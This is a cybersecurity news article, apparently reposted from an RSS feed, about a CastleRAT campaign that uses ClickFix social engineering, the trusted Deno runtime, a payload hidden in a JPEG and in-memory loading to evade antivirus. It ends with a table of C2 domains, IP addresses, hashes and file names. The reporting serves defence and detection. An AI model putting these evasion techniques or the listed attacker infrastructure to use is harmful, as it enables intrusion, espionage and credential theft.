By rssfeeds-admin 
This sophisticated attack chain bypasses traditional security measures, marking a significant leap in cybercriminal techniques.
The campaign uniquely exploits Deno, a popular, trusted runtime environment, to execute CastleRAT, a powerful remote access tool used for espionage and data theft.
This attack demonstrates how creative and stealthy modern malware campaigns have become, with attackers going to great lengths to avoid detection.
The “ClickFix” Social Engineering Trap and Deno Exploitation
The attack starts with a simple yet effective social engineering tactic called ClickFix, in which the victim is tricked into pasting a command into the Windows terminal to “fix” a browser error or CAPTCHA.
By bypassing traditional web security measures, the attackers cause the user to execute a command that silently downloads the malicious installer. This approach cleverly uses human error, making it harder to prevent and more likely to succeed.
Once the attacker has access to the system, instead of deploying malware immediately, they first install Deno, a legitimate and trusted runtime.
Antivirus software, typically configured to ignore Deno due to its digital signature, does not flag its installation.
This sets the stage for the next step: the attackers use Deno as a Trojan horse to execute obfuscated JavaScript.
Since Deno is a trusted process, the malware runs withelevated privileges, effectively bypassing traditional detection mechanisms.
Stealthy Execution and CastleRAT Payload Delivery
After the Deno runtime is established, the attackers further obscure their activity. The JavaScript code executed by Deno downloads a Python environment, cleverly disguised as Petuhon, and a JPEG image (CFBAT.jpg).
While the image seems harmless, it actually contains an encrypted CastleRAT payload. The Python script, protected by PyArmor, decodes the payload directly into memory using a technique known as reflective PE loading, meaning the malware never touches the disk.
This method evades file-scanning antivirus engines, making it virtually invisible to traditional security tools.
It sends this data to a Command and Control (C2) server. The malware also uses low-level Windows APIs to perform keylogging, clipboard hijacking, and data exfiltration, targeting sensitive information like cryptocurrency wallet files, browsing history, and developer credentials.
According to Threatdown research, to defend against such threats, organizations need to adopt behavioral monitoring and implement endpoint detection and response (EDR) tools.
| Indicator Type | Indicator Value |
|---|---|
| C2 Domain | dsennbuappec[.]zhivachkapro[.]com |
| C2 Domain | serialmenot[.]com |
| IP Address | 172[.]86.123.222 |
| IP Address | 23[.]94.145.120 |
| SHA256 Hash | aae017e7a36e016655c91bd01b4f3c46309bbe540733f82cce29392e72e9bd1f |
| SHA256 Hash | a4787a42070994b7f1222025828faf9b153710bb730e58da710728e148282e28 |
| Associated File | clickzpaqkvba.msi |
| Associated File | november_block25.vbs |
This innovative attack underscores the need for evolving security strategies that go beyond traditional methods, focusing on detecting and responding to suspicious behavior, rather than relying solely on static defenses.
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.
The post CastleRAT Exploits Deno Runtime To Bypass Enterprise Security appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.